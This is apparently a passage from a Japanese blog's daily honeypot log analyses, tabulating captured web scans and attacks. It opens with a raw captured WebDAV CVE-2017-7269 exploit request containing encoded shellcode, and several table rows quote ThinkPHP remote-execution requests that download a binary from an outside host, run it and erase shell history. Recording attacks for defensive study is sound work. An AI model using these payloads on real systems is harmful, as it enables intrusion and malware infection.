Host: localhost Connection: Close Content-Length: 0 If: <http://localhost/aaaaaaa潨硣睡焳椶䝲稹䭷佰畓穏䡨噣浔桅㥓偬啧杣㍤䘰硅楒吱䱘橑牁䈱瀵塐㙤汇㔹呪倴呃睒偡㈲测水㉇扁㝍兡塢䝳剐㙰畄桪㍴乊硫䥶乳䱪坺潱塊㈰㝮䭉前䡣潌畖畵景癨䑍偰稶手敗畐橲穫睢癘扈攱ご汹偊呢倳㕷橷䅄㌴摶䵆噔䝬敃瘲牸坩䌸扲娰夸呈ȂȂዀ栃汄剖䬷汭佘塚祐䥪塏䩒䅐晍Ꮐ栃䠴攱潃湦瑁䍬Ꮐ栃千橁灒㌰塦䉌灋捆关祁穐䩬> (Not <locktoken:write1>) <http://localhost/bbbbbbb祈慵佃潧歯䡅㙆杵䐳㡱坥婢吵噡楒橓兗㡎奈捕䥱䍤摲㑨䝘煹㍫歕浈偏穆㑱潔瑃奖潯獁㑗慨穲㝅䵉坎呈䰸㙺㕲扦湃䡭㕈慷䵚慴䄳䍥割浩㙱乤渹捓此兆估硯牓材䕓穣焹体䑖漶獹桷穖慊㥅㘹氹䔱㑲卥塊䑎穄氵婖扁湲昱奙吳ㅂ塥奁煐〶坷䑗卡Ꮐ栃湏栀湏栀䉇癪Ꮐ栃䉗佴奇刴䭦䭂瑤硯悂栁儵牺瑺䵇䑙块넓栀ㅶ湯ⓣ栁ᑠ栃̀翾Ꮐ栃Ѯ栃煮瑰ᐴ栃⧧栁鎑栀㤱普䥕げ呫癫牊祡ᐜ栃清栀眲票䵩㙬䑨䵰艆栀䡷㉓ᶪ栂潪䌵ᏸ栃⧧栁VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JB9lk8sYkPkPypC0CY7uNQfr1TdKNrP0TKPRlLDKaBMDtKqbkxjoh70JNFP1yoP17PDlMls1QlYrnLmP7QXOlMZaI7K2hp22Nw4KqBjpBk12oLKQJ02kq03HE5WPQdOZm18PB0tKMxlXbk0XO0m1j3zCml0IrkLt2kiqxVnQYo01upvLva6ojmyqfgLxyPd5Xt9sQmHxoKqmLdSExbnxBk1Ho49qXSC6rkjlpK2kb8mLja8SDKjdDKKQ6pu90DmTNDaKqKOq1IPZr19ogpOhOo0ZtKzrXksVomqXPnc5qdm0ph1g2IPn0i2iJFR40hPLsGKvIwIoz5P1ioNwaGnw0WofRHnZofSIuWioJ5XkOpQKlqy921nqPjkSoanqrJPPr3r0Ph27ayCoev9oYEXk0OqImaFrNrBHkPp2aPtDNrNrB2r10Rb0S8hknunNoKkOZ5E96faZjp1KRHaplsipKPQygprJm4R0BJkoNvrHQenfeNTFIoiE019oogogNw27QF2HNMjfJxsKkOIEbeupqeMVNkZordu3kPM09pHkXQwyVDYpKPKPK8fLyoKOyonOpibMpa1W2Ed3NO1Qc2RCnONdpLnN0pS82PkPXkRKMay0Oo20BJm20jm2B01ZYrpjM20Wc88ZYfYJpO9o6u63MawP2FfXkTm3O9i4r4BmnlO4m8ma90vTLC2021ofc8LRV62iiRYoYEReEpqdLmNxu5EprTJvqZm0OdR0bmoTo4jl0Pb3bHLm1GFN1Kiovuu3JL9tHkXNpSc8FfRvqwnryoWeRJYpqGbHlq2kBOqwiovuaZkPBHXpee3rqFIo9EXhdPIoyo9oMsmjnOnOnrS5RC1ic3RLbE0rloloBS2VOsph2O2SsDlns51hPeIphhIbKNioKOp109OBLnmaP4mdlnP105P0nNNQoHLxkPAA>
件数 | 種別 | リクエスト |
728 | WordPressに関する調査 | GET /wp-login.php |
722 | WordPressに対するブルートフォース攻撃 | POST /wp-login.php |
713 | Bad Request | |
241 | アクセス | GET / |
17 | 不正中継の調査 | GET api.ipify[.]org/ |
8 | 不正中継の調査 | GET api.binance[.]com/api/v1/time |
7 | Tomcat管理ページへのブルートフォース攻撃 | GET /manager/html |
6 | ZmEuによるスキャン | GET /phpMyAdmin/scripts/setup.php |
6 | ZmEuによるスキャン | GET /phpmyadmin/scripts/setup.php |
6 | ZmEuによるスキャン | GET /pma/scripts/setup.php |
6 | ZmEuによるスキャン | GET /w00tw00t.at.blackhats.romanian.anti-sec:) |
5 | 環境設定の調査 | GET /.env |
4 | ThinkPHPに関する調査 | GET /TP/public/index.php |
4 | ThinkPHPに対する攻撃 | GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 |
4 | 環境設定の調査 | GET /api/.env |
4 | 不明 | GET /nx8j78af1b.jsp |
4 | ZmEuによるスキャン | GET /phpmy/scripts/setup.php |
4 | ThinkPHPに対する攻撃 | POST /TP/public/index.php?s=captcha |
3 | アクセス | GET /favicon.ico |
3 | クローリング | GET /robots.txt |
3 | 不正中継の調査 | GET 5.188.210.101/echo.php |
2 | SSL証明書発行時の一時ファイルの調査 | GET /.well-known/security.txt |
2 | 不明 | GET /admin/ |
2 | WordPressに関する調査 | GET /blog/wp-includes/wlwmanifest.xml |
2 | WordPressに関する調査 | GET /cms/wp-includes/wlwmanifest.xml |
2 | WebLogic に関する調査 | GET /console/login/LoginForm.jsp |
2 | 不明 | GET /db/ |
2 | WordPressに関する調査 | GET /dev/wp-includes/wlwmanifest.xml |
2 | Apache Struts 2に関する調査 | GET /index.action |
2 | JMXコンソールに関する調査 | GET /jmx-console/ |
2 | ZmEuによるスキャン phpMyAdminに関する調査 | GET /myadmin/scripts/setup.php |
2 | 不明 | GET /pma/ |
2 | WordPressに関する調査 | GET /site/wp-includes/wlwmanifest.xml |
2 | サイトの構成調査 | GET /sitemap.xml |
2 | WordPressに関する調査 | GET /web/wp-includes/wlwmanifest.xml |
2 | WordPressに関する調査 | GET /website/wp-includes/wlwmanifest.xml |
2 | WordPressに関する調査 | GET /wordpress/wp-includes/wlwmanifest.xml |
2 | WordPressに関する調査 | GET /wp-includes/wlwmanifest.xml |
2 | WordPressに関する調査 | GET /wp/wp-includes/wlwmanifest.xml |
2 | WordPressに関する調査 | GET /wwww/wp-includes/wlwmanifest.xml |
2 | クローリング | HEAD /robots.txt |
2 | Spring Data Commonsの脆弱性(CVE-2018-1273)に関する攻撃 | POST /users?page=&size=5 |
1 | Laravelに関する調査 | GET /.env.example |
1 | Gitに関する調査 | GET /.git/config |
1 | WordPressのユーザー情報の取得 | GET ///?author=1 |
1 | WordPressのユーザー情報の取得 | GET ///wp-json/wp/v2/users/ |
1 | phpListに関する調査 | GET /Lists/admin.php |
1 | ZmEuによるスキャン phpMyAdminに関する調査 | GET /MyAdmin/scripts/setup.php |
1 | Tomato RAFに関する調査 | GET /admin-scripts.asp |
1 | FreePBXに関する調査 | GET /admin//config.php |
1 | Kubernetesに関する調査 | GET /api/v1/namespaces/kube-system/services/https:kubernetes-dashboard:/proxy/ |
1 | ZmEuによるスキャン phpMyAdminに関する調査 | GET /db/scripts/setup.php |
1 | Apache Strutsに関する調査 | GET /index.do |
1 | WordPressに関する調査 | GET /press/wp-login.php |
1 | 不明 | GET /script |
1 | Apache Struts 2に関する調査 | GET /struts2-rest-showcase/orders.xhtml |
1 | DFindによるスキャン | GET /w00tw00t.at.ISC.SANS.DFind:) |
1 | WebDAVに関する調査 | GET /webdav/ |
1 | WordPressに関する調査 | GET /wordpress1/wp-login.php |
1 | WordPressに関する調査 | GET /wordpress2/wp-login.php |
1 | WordPressに関する調査 | GET /wordpress3/wp-login.php |
1 | WordPressに関する調査 | GET /wordpress4/wp-login.php |
1 | WordPressに関する調査 | GET /wordpress5/wp-login.php |
1 | WordPressに関する調査 | GET /wordpress6/wp-login.php |
1 | WordPressのユーザー情報の取得 | GET /wp-json/wp/v2/users/ |
1 | WordPressに関する調査 | GET /wp/wp-login.php |
1 | WordPressに関する調査 | GET /wp2/wp-login.php |
1 | WordPressに関する調査 | GET /wp4/wp-login.php |
1 | WordPressに関する調査 | GET /wp5/wp-login.php |
1 | WordPressに関する調査 | GET /wp6/wp-login.php |
1 | WordPressに関する調査 | GET /wp7/wp-login.php |
1 | WordPressに関する調査 | GET /wp8/wp-login.php |
1 | 不正中継の調査 | GET api.binance[.]com/api/v1/depth?symbol=ETHBTC |
1 | 不正中継の調査 | GET www.binance[.]com/api/v1/depth?symbol=ETHBTC |
1 | 不正中継の調査 | GET www.proxylists[.]net/proxyjudge.php |
1 | アクセス | HEAD / |
1 | 不明 | OPTIONS / |
1 | Linksysの脆弱性に関する攻撃 | POST 192.168.0[.]14/tmUnblock.cgi |
1 | WebDAVの脆弱性(CVE-2017-7269)に関する攻撃 | PROPFIND / |
BW-Potのログ分析 (2019/04/24)
本日の総アクセス件数は138件です。送信元IP数は7IPです。
少ないですね。
件数 | 種別 | リクエスト |
66 | phpMyAdminに関する攻撃 | POST /phpmyadmin/ |
63 | アクセス | GET / |
2 | Cisco製ルータの脆弱性(CVE-2019-1653)に関する攻撃 | GET /cgi-bin/config.exp |
2 | 環境設定の調査 | GET /.env |
1 | 不正中継の調査 | GET 110.249.212[.]46/testget?q=23333&port=80 |
1 | 不正中継の調査 | GET httpheader[.]net/ |
1 | Tomcat管理ページへのブルートフォース攻撃 | GET /manager/html |
1 | アクセス | HEAD / |
1 | 不明 | GET /index.php?s=/index/ hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget hxxp://185.244.25[.]131/x86 -O .Akari; chmod +x .Akari; rm -rf .Akari x86; history -c -w;exit;logout;' |
BW-Potのログ分析 (2019/04/23)
本日の総アクセス件数は165件です。送信元IP数は68IPです。
・気になる通信
GET /muieblackcat
phpmyadminに対してのスキャナのようです。
件数 | 種別 | リクエスト |
67 | phpMyAdminに関する攻撃 | POST /phpmyadmin/ |
63 | アクセス | GET / |
5 | 不正中継の調査 | GET www.baidu[.]com/ |
4 | Apache Struts 2に関する調査 | GET /index.action |
2 | Tomcat管理ページへのブルートフォース攻撃 | GET /manager/html |
2 | phpMyAdminに関する調査 | GET //MyAdmin/scripts/setup.php |
2 | phpMyAdminに関する調査 | GET //myadmin/scripts/setup.php |
2 | phpMyAdminに関する調査 | GET //phpMyAdmin/scripts/setup.php |
2 | phpMyAdminに関する調査 | GET //phpmyadmin/scripts/setup.php |
2 | phpMyAdminに関する調査 | GET //pma/scripts/setup.php |
2 | phpMyAdminに関する調査 | GET /muieblackcat |
1 | 不正中継の調査 | GET api.binance[.]com/api/v1/time |
1 | 不正中継の調査 | GET www.proxylists[.]net/proxyjudge.php |
1 | ThinkPHPに関する攻撃 | GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget%20hxxp://81.6.42[.]123/a_thk.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; |
1 | phpMyAdminに関する調査 | GET /MyAdmin/scripts/setup.php |
1 | phpMyAdminに関する調査 | GET /myadmin/scripts/setup.php |
1 | phpMyAdminに関する調査 | GET /phpMyAdmin/scripts/setup.php |
1 | phpMyAdminに関する調査 | GET /phpmyadmin/scripts/setup.php |
1 | phpMyAdminに関する調査 | GET /pma/scripts/setup.php |
1 | phpMyAdminに関する調査 | GET /w00tw00t.at.blackhats.romanian.anti-sec:) |
1 | クローリング | HEAD /robots.txt |
1 | 不明 | GET /acadmin.php |
1 | 環境設定の調査 | GET /.env |
参考リンク